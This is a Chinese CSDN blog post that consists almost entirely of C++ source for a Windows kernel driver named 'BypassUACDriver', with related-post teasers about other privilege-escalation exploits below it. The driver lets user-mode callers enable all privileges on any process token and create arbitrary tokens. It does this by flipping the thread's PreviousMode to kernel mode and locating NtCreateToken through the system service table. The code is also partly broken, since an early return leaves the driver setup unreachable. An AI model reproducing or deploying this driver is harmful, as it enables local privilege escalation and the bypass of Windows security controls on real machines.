提权驱动?

最新推荐文章于 2023-12-29 14:29:33 发布
最新推荐文章于 2023-12-29 14:29:33 发布
阅读量313 收藏
点赞数
分类专栏: C++ 文章标签: c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzy1448331580/article/details/126266109
版权 
#define BYPASS_UAC_DEVICE_NAME      L"\\Device\\BypassUACDriver"
#define BYPASS_UAC_DEVICE_SYMBOLIC  L"\\DosDevices\\BypassUACDriver"
#define BYPASS_UAC_SERVICE_NAME     L"BypassUACDriver"
#define BYPASS_UAC_DRIVER_NAME      L"BypassUACDriver.sys"


#define FUNCTION_FROM_CTL_CODE(ctrlCode)     (((ULONG)(ctrlCode) & 0x00003FFC) >> 2)

#define BH_IOCTL_CODE(Function, Method)   ((ULONG)CTL_CODE(FILE_DEVICE_UNKNOWN, Function, Method, FILE_ANY_ACCESS) | (1 << 31))
#define BH_IOCTL_METHOD (METHOD_OUT_DIRECT)

#define IOCTL_HANDLER(_func) NTSTATUS _func(PAAKDI Info, PDEVICE_OBJECT DeviceObject, PIRP Irp,PULONG_PTR BytesWritten)
#define CALL_IOCTL_HANDLER(_func) Status = (_func)(Info, DeviceObject, Irp, &BytesWritten)
#define HANDLE_IOCTL(_ioctl, _func) case (_ioctl): CALL_IOCTL_HANDLER((_func)); break

#define IOCTL_OPEN_PROCESS_TOKEN        BH_IOCTL_CODE(BhOpenProcessToken,       BH_IOCTL_METHOD)
#define IOCTL_CREATE_TOKEN              BH_IOCTL_CODE(BhCreateToken,            BH_IOCTL_METHOD)
#define IOCTL_ADJUST_PRIVILEGE          BH_IOCTL_CODE(BhAdjustPrivilege,        BH_IOCTL_METHOD)

enum
{
    BhFunctionFirst         = 0x800,
        
    BhOpenProcessToken,
    BhCreateToken,
    BhAdjustPrivilege,

    BhFcunctionLast,
};

#pragma pack(push, 8)

typedef struct
{
    HANDLE64    Process;
    ACCESS_MASK Access;
    PVOID64     Token;

} BH_OPEN_PROCESS_TOKEN, *PBH_OPEN_PROCESS_TOKEN;

typedef struct
{
    PHANDLE                 TokenHandle;
    ACCESS_MASK             DesiredAccess;
    POBJECT_ATTRIBUTES      ObjectAttributes;
    TOKEN_TYPE              TokenType;
    PLUID                   AuthenticationId;
    PLARGE_INTEGER          ExpirationTime;
    PTOKEN_USER             User;
    PTOKEN_GROUPS           Groups;
    PTOKEN_PRIVILEGES       Privileges;
    PTOKEN_OWNER            Owner;
    PTOKEN_PRIMARY_GROUP    PrimaryGroup;
    PTOKEN_DEFAULT_DACL     DefaultDacl;
    PTOKEN_SOURCE           TokenSource;

} BH_CREATE_TOKEN, *PBH_CREATE_TOKEN;

typedef struct 
{
    HANDLE64 Process;

} BH_ADJUST_PRIVILEG, *PBH_ADJUST_PRIVILEG;

#pragma pack(pop)

#pragma comment(linker, "/ENTRY:DriverEntry")

#define ML_DEBUG_KERNEL 1

#include "MyLibrary.cpp"
#include "DriverHelper.h"

TYPE_OF(NtCreateToken)  *KiCreateToken;

ULONG_PTR PreviousModeOffset;

NTSTATUS CreateToken(PBH_CREATE_TOKEN Create)
{
    NTSTATUS            Status;
    KPROCESSOR_MODE     PreviousMode;
    PETHREAD            Thread;
    OBJECT_ATTRIBUTES   oa;
    UNICODE_STRING      ObjectName;

    Thread = KeGetCurrentThread();
    PreviousMode = ExGetPreviousMode();

    *(KPROCESSOR_MODE *)PtrAdd(Thread, PreviousModeOffset) = KernelMode;

    oa.Length                   = Create->ObjectAttributes->Length;
    oa.RootDirectory            = (HANDLE)Create->ObjectAttributes->RootDirectory;
    oa.ObjectName               = NULL;
    oa.Attributes               = Create->ObjectAttributes->Attributes;
    oa.SecurityDescriptor       = (PVOID)Create->ObjectAttributes->SecurityDescriptor;
    oa.SecurityQualityOfService = (PVOID)Create->ObjectAttributes->SecurityQualityOfService;

    Status = KiCreateToken(
                (PHANDLE)Create->TokenHandle,
                Create->DesiredAccess,
                &oa,
                (TOKEN_TYPE)Create->TokenType,
                (PLUID)Create->AuthenticationId,
                Create->ExpirationTime,
                (PTOKEN_USER)Create->User,
                (PTOKEN_GROUPS)Create->Groups,
                (PTOKEN_PRIVILEGES)Create->Privileges,
                (PTOKEN_OWNER)Create->Owner,
                (PTOKEN_PRIMARY_GROUP)Create->PrimaryGroup,
                (PTOKEN_DEFAULT_DACL)Create->DefaultDacl,
                (PTOKEN_SOURCE)Create->TokenSource
            );

    *(KPROCESSOR_MODE *)PtrAdd(Thread, PreviousModeOffset) = PreviousMode;

    return Status;
}

NTSTATUS AdjustAllPrivilege(PBH_ADJUST_PRIVILEG AdjustPrivilege)
{
    NTSTATUS                Status;
    HANDLE                  Token;
    ULONG                   ReturnLength;
    ULONG_PTR               PrivilegeCount, BufferLength, SePrivilege;
    PTOKEN_PRIVILEGES       Privileges, PreviousState;
    PLUID_AND_ATTRIBUTES    Luid;

    DEBUG_BREAK_POINT();

    Status = ZwOpenProcessToken(AdjustPrivilege->Process, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &Token);
    FAIL_RETURN(Status);

    PrivilegeCount = SE_MAX_WELL_KNOWN_PRIVILEGE - SE_MIN_WELL_KNOWN_PRIVILEGE + 1;
    BufferLength = sizeof(Privileges->PrivilegeCount) + sizeof(Privileges->Privileges[0]) * PrivilegeCount;
    Privileges = (PTOKEN_PRIVILEGES)AllocStack(BufferLength);
    PreviousState = (PTOKEN_PRIVILEGES)AllocStack(BufferLength);

    Privileges->PrivilegeCount = PrivilegeCount;

    SePrivilege = SE_MIN_WELL_KNOWN_PRIVILEGE;
    FOR_EACH(Luid, Privileges->Privileges, PrivilegeCount)
    {
        Luid->Luid.LowPart = SePrivilege++;
        Luid->Luid.HighPart = 0;
        Luid->Attributes = SE_PRIVILEGE_ENABLED;
    }

    Status = ZwAdjustPrivilegesToken(Token, FALSE, Privileges, BufferLength, PreviousState, &ReturnLength);
    ZwClose(Token);

    return Status;
}

NTSTATUS
NTAPI
BhDispatchDeviceControl(
    PDEVICE_OBJECT  DeviceObject,
    PIRP            Irp
)
{
    NTSTATUS            Status;
    ULONG_PTR           ParamSize;
    PIO_STACK_LOCATION  IoStack;

    union
    {
        PBH_OPEN_PROCESS_TOKEN  OpenToken;
        PBH_CREATE_TOKEN        CreateToken;
        PBH_ADJUST_PRIVILEG     AdjustPrivilege;
        PVOID Input;
    };

    IoStack = IoGetCurrentIrpStackLocation(Irp);
    Status  = STATUS_INVALID_DEVICE_REQUEST;

    Input = MmGetSystemAddressForMdlSafe(Irp->MdlAddress, NormalPagePriority);
    ParamSize = IoStack->Parameters.DeviceIoControl.OutputBufferLength;

    switch (FUNCTION_FROM_CTL_CODE(IoStack->Parameters.DeviceIoControl.IoControlCode))
    {
        case BhAdjustPrivilege:
            Status = AdjustAllPrivilege(AdjustPrivilege);
            break;

        case BhOpenProcessToken:
            if (ParamSize != sizeof(*OpenToken))
            {
                Status = STATUS_INVALID_BUFFER_SIZE;
                break;
            }

            Status = ZwOpenProcessToken(OpenToken->Process, OpenToken->Access, (PHANDLE)OpenToken->Token);
            break;

        case BhCreateToken:
            if (ParamSize != sizeof(*CreateToken))
            {
                Status = STATUS_INVALID_BUFFER_SIZE;
                break;
            }

            Status = ::CreateToken(CreateToken);
            break;
    }

    Irp->IoStatus.Status      = Status;
    Irp->IoStatus.Information = 0;

    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return Status;
}

NTSTATUS
NTAPI
BhDispatchCreateClose(
    PDEVICE_OBJECT  DeviceObject,
    PIRP            Irp
)
{
    NTSTATUS Status = STATUS_SUCCESS;

    Irp->IoStatus.Status        = Status;
    Irp->IoStatus.Information   = 0;

    IoCompleteRequest(Irp, IO_NO_INCREMENT);

    return Status;
}

ULONG_PTR KiGetPreviousModeOffset()
{
    PBYTE Buffer;
    LONG_PTR Length;

    Buffer = (PBYTE)ExGetPreviousMode;

    for (LONG_PTR MaxSize = 0x10; MaxSize > 0; )
    {
        Length = GetOpCodeSize(Buffer);
        switch (Buffer[0])
        {
            case 0x8A:
                if (Length != 6)
                    break;

                return *(PULONG)(Buffer + 2);

            // 0fb680 32020000  movzx   eax,byte ptr [rax+232h]
            case 0x0F:
                if (Length != 7)
                    break;

                if (Buffer[1] != 0xB6 || Buffer[2] != 0x80)
                    break;

                return *(PULONG)(Buffer + 3);
        }

        Buffer += Length;
        MaxSize -= Length;
    }

    return 0;
}

ULONG_PTR KiGetServiceIndexByRoutine(PVOID Routine)
{
    PBYTE       Buffer;
    LONG_PTR    Length;
    ULONG_PTR   ServiceIndex;

    ServiceIndex = ~0u;

    Buffer = (PBYTE)Routine;
    for (LONG_PTR MaxSize = 0x20; MaxSize > 0; )
    {
        Length = GetOpCodeSize(Buffer);
        switch (Buffer[0])
        {
            case 0xB8:
                if (Length != 5)
                    break;

                ServiceIndex = *(PULONG)(Buffer + 1);
                return ServiceIndex;
        }

        Buffer += Length;
        MaxSize -= Length;
    }

    return ~0u;
}

PVOID KiFindKiServiceTable(PLDR_MODULE nt)
{
    PVOID       KiServiceTable;
    ULONG_PTR   ProbeIndex;
    LDR_MODULE  newnt;
    PKSERVICE_TABLE_DESCRIPTOR SSDT;

    ProbeIndex = KiGetServiceIndexByRoutine(ZwSetEvent);
    if (ProbeIndex == -1)
        return NULL;

    newnt = *nt;

#if ML_AMD64

    PVOID reloadnt;
    NTSTATUS Status;

    Status = ReLoadDll(nt->FullDllName.Buffer, &reloadnt, nt->DllBase, RELOAD_DLL_IGNORE_IAT | RELOAD_DLL_NOT_RESOLVE_PATH);
    if (NT_FAILED(Status))
        return NULL;

    newnt.DllBase = reloadnt;

#endif

    auto RelocateCheck = [] (PRELOCATE_ADDRESS_INFO Address, PVOID PointerToAddress) -> BOOL
    {
        if (*(PVOID *)Address->Context == NULL)
            *(PVOID *)Address->Context = (PVOID *)PointerToAddress;

        return FALSE;
    };

    RELOCATE_ADDRESS_INFO Address[] =
    {
        { NtSetEvent, NULL, RelocateCheck, &KiServiceTable },
    };

    KiServiceTable = NULL;
    RelocateAddress(&newnt, Address, countof(Address));

    if (KiServiceTable != NULL)
        KiServiceTable = (PVOID *)KiServiceTable - ProbeIndex;

#if ML_AMD64

    if (KiServiceTable != NULL)
        KiServiceTable = PtrAdd(KiServiceTable, PtrOffset(nt->DllBase, newnt.DllBase));

    UnLoadDll(reloadnt);

#endif

    return KiServiceTable;
}

PVOID GetSerivceRoutine(PVOID KiServiceTable, ULONG_PTR ServiceIndex)
{
#if ML_X86
    return ((PVOID *)KiServiceTable)[ServiceIndex];

#elif ML_AMD64
    return PtrAdd(KiServiceTable, ((PLONG)KiServiceTable)[ServiceIndex] >> 4);
#else
#error

#endif

}

PVOID GetNtCreateToken(PLDR_MODULE nt)
{
    ULONG_PTR   NtCreateTokenIndex;
    PVOID      *KiServiceTable, ntdll;
    PBYTE       ZwCreateToken;
    NTSTATUS    Status;

    KiServiceTable = (PVOID *)KiFindKiServiceTable(nt);
    if (KiServiceTable == NULL)
        return NULL;

    NtCreateTokenIndex = ~0u;

    Status = ReLoadDll(L"\\SystemRoot\\System32\\ntdll.dll", (PVOID *)&ntdll, NULL, RELOAD_DLL_IGNORE_IAT | RELOAD_DLL_NOT_RESOLVE_PATH);
    if (!NT_SUCCESS(Status))
        return NULL;

    ZwCreateToken = (PBYTE)EATLookupRoutineByHashPNoFix(ntdll, NTDLL_NtCreateToken);
    if (ZwCreateToken != NULL)
        NtCreateTokenIndex = KiGetServiceIndexByRoutine(ZwCreateToken);

    UnLoadDll(ntdll);

    if (NtCreateTokenIndex == -1)
        return NULL;

    return GetSerivceRoutine(KiServiceTable, NtCreateTokenIndex);
}

VOID NTAPI DriverUnload(PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING SymbolicName;

    RTL_CONST_STRING(SymbolicName, BYPASS_UAC_DEVICE_SYMBOLIC);
    IoDeleteDevice(DriverObject->DeviceObject);
    IoDeleteSymbolicLink(&SymbolicName);
}

NTSTATUS NTAPI DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    NTSTATUS            Status;
    UNICODE_STRING      DeviceName, SymbolicName;
    OBJECT_ATTRIBUTES   ObjectAttributes;
    PDEVICE_OBJECT      DeviceObject;

    DEBUG_BREAK_POINT();

    PLDR_MODULE nt;

    nt = LookupPsLoadedModuleList((PLDR_MODULE)DriverObject->DriverSection, _ReturnAddress());
    PVOID KiServiceTable;

    KiServiceTable = KiFindKiServiceTable(nt);

    KDPC Dpc;
    KTIMER Timer;
    PKTIMER NextTimer;
    LARGE_INTEGER DueTime;

    FormatTimeOut(&DueTime, 1000);

    KeInitializeDpc(&Dpc,
        [] (PKDPC Dpc, PVOID DeferredContext, PVOID SystemArgument1, PVOID SystemArgument2)
        {
            return;
        },
        0
    );

    KeInitializeTimerEx(&Timer, SynchronizationTimer);
    if (!KeSetTimerEx(&Timer, DueTime, 1000, &Dpc))
        return 0;

    NextTimer = &Timer;
    do
    {
        DbgPrint("Dpc = %p, DueTime = %I64d\n", NextTimer->Dpc, NextTimer->DueTime.QuadPart);
        NextTimer = FIELD_BASE(NextTimer->TimerListEntry.Flink, KTIMER, TimerListEntry);

    } while (NextTimer != &Timer);

    KeCancelTimer(&Timer);

    return 0;

    PreviousModeOffset = KiGetPreviousModeOffset();
    if (PreviousModeOffset == 0)
        return STATUS_UNSUCCESSFUL;

    *(PVOID *)&KiCreateToken = GetNtCreateToken(LookupPsLoadedModuleList((PLDR_MODULE)DriverObject->DriverSection, _ReturnAddress())->NextLoadOrder());
    if (KiCreateToken == 0)
        return STATUS_UNSUCCESSFUL;

    DriverObject->DriverUnload = DriverUnload;

    RTL_CONST_STRING(DeviceName, BYPASS_UAC_DEVICE_NAME);

    Status = IoCreateDevice(
                DriverObject,
                0,
                &DeviceName,
                FILE_DEVICE_UNKNOWN,
                0,
                FALSE,
                &DeviceObject
             );
    FAIL_RETURN(Status);

    RTL_CONST_STRING(SymbolicName, BYPASS_UAC_DEVICE_SYMBOLIC);
    Status = IoCreateSymbolicLink(&SymbolicName, &DeviceName);
    if (!NT_SUCCESS(Status))
    {
        IoDeleteDevice(DeviceObject);
        return Status;
    }

    DriverObject->MajorFunction[IRP_MJ_CREATE]                  = BhDispatchCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE]                   = BhDispatchCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]          = BhDispatchDeviceControl;

    return STATUS_SUCCESS;
}
ThatAllOver
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CPU-Z 驱动,权限提升+任意代码执行(CVE-2017-15303)复现
锋刃科技的博客
12-21 1951
漏洞描述 在1.43之前的CPUID CPU-Z中,存在任意内存写入操作,直接导致特权提升,因为在本地计算机上运行的任何程序(在CPU-Z运行时)都可以向内核模式驱动程序发出ioctl 0x9C402430调用(例如,版本1.41的cpuz141_x64.sys)。实际上在复现过程中发现配合ioctl 0x9C402420 ,不仅可以特权提升,还可以任意内核代码执行,可以修改系统所有重要数据结构,绕过Windows的强制驱动签名,严重影响系统安全性。 漏洞形成 复现环境为win 7 x64 ...
驱动中的进程提权
Rprop
01-25 2762
<br />void NtImprove(HANDLE ProcessHandle) { HANDLE Token; UseData.Status = ZwOpenProcessTokenEx(ProcessHandle, TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, OBJ_KERNEL_HANDLE, &Token); //Open the access token associated with a process CheckRet; ZwDebugF("
驱动实现win7下cmd提权
cqyczj的专栏
04-20 2721
驱动程序是Stoned Bootkit Framework中的一部分,修改部分code实现重启桌面后对cmd和记事本进行提权; 编译环境: WDK 7600.16385.0 测试方法: 首先运行cmd或记事本,然后加载驱动程序,重新启动桌面进程explorer.exe,此时打开任务管理器,即可看到效果如图: 代码如下: //win7
任意地址读写驱动提权(cred、VDSO、modprobe_path、core_pattern、修改内核指针提权
YJM_____的博客
02-17 734
驱动提权实战 题目网址:https://github.com/bsauce/kernel_exploit_series 业务流程 ioctl 先分析下驱动程序 static long do_ioctl(struct file *filp, unsigned int cmd, unsigned long args) { int ret; unsigned long *p_arg = (unsigned long *)args; ret = 0; switch(cmd) { ... case
access驱动程序_Windows打印机驱动程序本地提权漏洞分析(CVE201919363)
weixin_39527163的博客
11-26 325
打印机制造商Ricoh已要求Pentagrid协调披露了一个提权漏洞,以缓解影响多种打印机的Windows打印机驱动程序的漏洞。由于在将打印机添加到Windows系统时安装的文件系统条目的文件权限设置不当,因此任何本地用户都可以使用自己的代码覆盖程序库文件(DLL)。0x01 漏洞描述Windows加载了受不当保护的库文件PrintIsolationHost.exe,这是一个以Windo...
system提权工具
09-16
"system提权工具"是指能够帮助用户获取或提升到system权限级别的工具。这类工具通常被系统管理员和安全研究人员用来进行合法的系统调试、故障排除或安全审计。然而,不正当的使用可能导致严重的安全风险,因为system...
linux 2.6.17 提权
07-04
例如,某些内存管理、文件系统、网络协议栈或者设备驱动程序的实现可能存在缺陷,这些都可能成为提权的入口点。在2.6.17这个版本中,可能存在如缓冲区溢出、整数溢出、权限混淆、race condition(竞态条件)等类型的...
lpk.rar_delphi 提权_提权
09-21
标题中的"lpk.rar_delphi 提权_提权"表明这是一个与Delphi编程语言相关的提权(Privilege Escalation)技术,特别是通过一个名为"lpk.dll"的动态链接库来实现。在Windows系统中,提权是指非管理员用户获取更高的系统...
windows7提权
04-26
提权虽然方便,但也有安全隐患,因为恶意软件可能会利用提权漏洞。因此,只在必要时提升权限,并确保来源可靠的程序在管理员模式下运行。同时,定期更新系统和软件,以防止利用已知漏洞进行提权的攻击。 总结来说,...
360提权工具
10-18
在IT安全领域,"提权"一词通常指的是在计算机系统中提升用户的权限等级,从普通用户变为管理员或系统级别的用户。这通常是黑客攻击的一部分,目的是获取对目标系统的更广泛控制。360提权工具可能是一种利用360安全...
支持system权限,NSudo 6.2 windows下任意权限提权工具
01-10
适用于windowsNT内核的权限提取工具,支持System级,administrator,TrustedInstaller等特殊权限提权,提供GUI界面+命令行调用方式。支持32位64位,win7/8/8.1/10/2008r2/server2012/server2012r2/server2016/server2019
c语言提权,三个给进程提权的方法 (c/cpp)
weixin_32473663的博客
05-19 855
#defineSE_CREATE_TOKEN_NAME TEXT("SeCreateTokenPrivilege")#defineSE_ASSIGNPRIMARYTOKEN_NAME TEXT("SeAssignPrimaryTokenPrivilege")#defineSE_LOCK_MEMORY_NAME TEXT("SeLo...
windows提权思路
weixin_68210863的博客
10-29 1092
windows十四种提权思路笔记
驱动中如何给ring3层应用程序提权
我爱密码学
09-24 4508
为什么会有这个需求就不用我多说了吧:)目前在驱动提权我知道的有三种办法1.  该方法来源于stoned bootkit,主要原理是把services.exe的EPROCESS中的Token值取出来,直接赋值给需要提权的应用程序,这种方法需要硬编码,并且有较大的机率蓝屏。主要是因为Token值会被释放和DeReference2.在进程创建时,使用ZwOpenProcess、ZwOpenProces
指定PID句柄提权
qq_45844442的博客
07-28 635
上一节句柄降权是降权驱动将我们CE中的私有句柄表的DbgVIew成员权限给换了,所以我们的方案就是将这个权限提升回去,但是这样就会出现一闪一闪的样子,因为降权驱动一遍在降权提权驱动一遍在提权,所以这时候的思路是让降权驱动失效。根据上节我们可以看到降权驱动是在判断CE中的私有句柄表中是否有DbgView的句柄,那么办法就是换掉这个CE私有句柄表中的DbgView句柄,但是新的DbgView句柄中内容和原来保存的是一致的,代码如下。3.在驱动中抹除CR3、PID、名称只是为了防止更深层检测,并不影响提权
驱动ShellCode注入
最新发布
qq_18811919的博客
12-29 493
【代码】驱动ShellCode注入。
Android内核层驱动程序UAF漏洞提权实例
道阻且长,行则将至。
02-28 7555
文章目录前言UAF漏洞 前言 自 2021 年 11 月从国企离职并入职互联网私企后,发现博客很少更新了……自然不是因为开始躺平了(菜鸡的学习之路还很漫长…),而是新的平台充满挑战,需要学习的东西实在太多了(所以一直加班中…),加上很多内部学习材料和内容不可在公司外网传播,所以就很少写 CSDN 博文了。但是稍有时间还是要保持写博文习惯的hh,个人觉得这不仅是对个人技术成长的记录,也是一种促使自己不断保持学习状态的好习惯。 换工作后开始从事移动终端安全的方向,最近在学习 Android 内核层和驱动的漏洞挖
WIN10如何提取驱动
chenzhjlf的专栏
09-05 8599
驱动 win10
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
如何分析 CVE-2022-24521 Windows CLFS 本地提权漏洞?
03-25
CVE-2022-24521是Windows中的本地提权漏洞,影响Windows的CLFS(Common Log File System)驱动程序。该漏洞是由于CLFS驱动程序中存在的缺陷导致攻击者可以提升其进程的特权级别。 攻击者可以利用此漏洞在受感染的计算机上执行任意代码,绕过安全限制并获得系统管理员权限,以便进行高级攻击活动。 此漏洞是一个本地漏洞,攻击者需要在计算机上获得访问权限,才能利用此漏洞。如果攻击者不能访问计算机,则他们不能利用此漏洞。 建议用户尽快安装适当的安全补丁,以修复这个漏洞。如果暂时无法安装补丁,建议用户使用以下步骤加强安全措施: 1. 限制访问计算机的用户,并确保仅授予必要的访问权限。 2. 防止攻击者鱼塘式攻击,使用最新的反病毒软件和防火墙技术保护计算机。 3. 在敏感数据上加密存储,以防止数据泄露。 4. 使用最新的操作系统,软件和硬件,因为这些是对安全性最新漏洞可能会修复的要素。 5. 定期进行安全审查和升级,以确保计算机和数据得到最新的保护和防护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值